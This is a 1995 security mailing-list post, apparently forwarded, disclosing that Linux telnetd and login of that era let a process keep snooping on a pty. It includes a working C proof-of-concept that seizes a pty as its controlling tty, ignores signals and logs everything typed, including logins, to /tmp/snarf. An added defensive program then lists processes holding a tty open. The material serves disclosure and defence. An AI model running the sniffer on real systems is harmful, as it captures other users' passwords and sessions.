List: best-of-security
Subject: BoS: linux tty surfing
From: Julian Assange <proff () suburbia ! net>
Date: 1995-09-26 13:07:49
-----BEGIN PGP SIGNED MESSAGE-----
Hi all,

I've done some more testing on this, and got the following results
with 1.2.10 (yeah, I'm not really on the bleeding edge):

 * telnetd as of NetKit-0.5 does not protect you from anyone
   snooping on your pty. I guess we know that by now.

   There's some code in sys_term.c that does a vhangup on the
   pty, but it's commented out for Linux. The comment says that
   this appears to be buggy.

 * Using login from util-linux-2.2 helps a bit. If you do a
   cat /dev/ttyp0, it will terminate once login is executed by
   telnetd. That's because login *does* do a vhangup.

 * Unfortunately, this is not the end of it. I experimented
   a little, and found that a program that ignores all signals
   *and* makes the pty its controlling tty will happily live on,
   and is still able to read data from it. I'm including it
   below.

What I do not understand is why this does not make telnetd
fail when doing an ioctl(TIOCSCTTY). Anyone more familiar with
this stuff may be able to shed some light on this (Ted?).

Olaf
- --
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
For my PGP public key, finger okir@brewhq.swb.de.
- ------------------------------------------------------------------
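/*
 * simple test program for. Not my usual standard of coding...
 */
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <termios.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>		/* ioctl(), TIOCSCTTY */

int
main(int argc, char **argv)
{
	char	buffer[256];
	FILE	*fp;
	int	fd, i, n;

	if (argc < 2)		/* argv[1] is the pty to open */
		return 1;

	/* Drop every inherited descriptor, including stdin/stdout/stderr,
	 * so the perror() calls below have nowhere to print. */
	for (i = 0; i < 256; i++)
		close(i);

	/* New session, so that we have no controlling tty yet */
	setsid();

	if ((fd = open(argv[1], O_RDWR)) < 0) {
		perror("open");
		return 2;
	}

	/* Make the pty our controlling tty */
	if (ioctl(fd, TIOCSCTTY, NULL) < 0)
		perror("ioctl");

	if ((fp = fopen("/tmp/snarf", "w")) == NULL)
		return 2;

	/* Ignore every signal that can be ignored (signal 0 is not valid) */
	for (i = 1; i < 32; i++)
		signal(i, SIG_IGN);

	/* Log whatever still arrives on the pty */
	while ((n = read(fd, buffer, 255)) > 0) {
		buffer[n] = 0;
		fprintf(fp, "got %s\n", buffer);
	}
	perror("read");
	return 2;
}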
--
did I say, "dumb."
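
A defender-side check for the situation this message describes, a process that keeps a pty open across a login: the following is an added example, not code from the original post. It lists the PIDs that hold a descriptor on a given tty by walking /proc/<pid>/fd, which assumes a current Linux /proc layout and enough privilege (normally root) to read other users' fd directories; tty_holders and same_file are names chosen here.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Device nodes match on st_rdev (any node for that tty); other files on dev+inode. */
static int same_file(const struct stat *a, const struct stat *b)
{
    return S_ISCHR(a->st_mode) ? S_ISCHR(b->st_mode) && a->st_rdev == b->st_rdev
                               : a->st_dev == b->st_dev && a->st_ino == b->st_ino;
}

/* Collect up to max PIDs (except skip) that hold tty_path open; -1 on error. */
int tty_holders(const char *tty_path, pid_t skip, pid_t *out, int max)
{
    struct stat want, st;
    struct dirent *p, *f;
    char path[4096];
    DIR *proc, *fds;
    int found = 0, pid;
    if (stat(tty_path, &want) < 0 || (proc = opendir("/proc")) == NULL)
        return -1;
    while ((p = readdir(proc)) != NULL) {
        if (sscanf(p->d_name, "%d", &pid) != 1 || pid == skip)
            continue;                   /* not a PID directory, or skipped */
        snprintf(path, sizeof path, "/proc/%d/fd", pid);
        if ((fds = opendir(path)) == NULL)
            continue;                   /* exited, or not readable by us */
        while ((f = readdir(fds)) != NULL) {
            snprintf(path, sizeof path, "/proc/%d/fd/%s", pid, f->d_name);
            if (stat(path, &st) == 0 && same_file(&want, &st))
                break;                  /* one hit per process is enough */
        }
        if (f != NULL && found++ < max)
            out[found - 1] = pid;
        closedir(fds);
    }
    closedir(proc);
    return found;
}

int main(int argc, char **argv)
{
    pid_t pids[64];
    int n = argc > 1 ? tty_holders(argv[1], getpid(), pids, 64) : -1;
    for (int i = 0; i < n && i < 64; i++)
        printf("pid %ld holds %s open\n", (long)pids[i], argv[1]);
    return n < 0;
}
```

Run against a pty before handing it to a new session, any PID reported that is not part of that session is worth a look; unreadable /proc entries are skipped silently, so an unprivileged run can under-report.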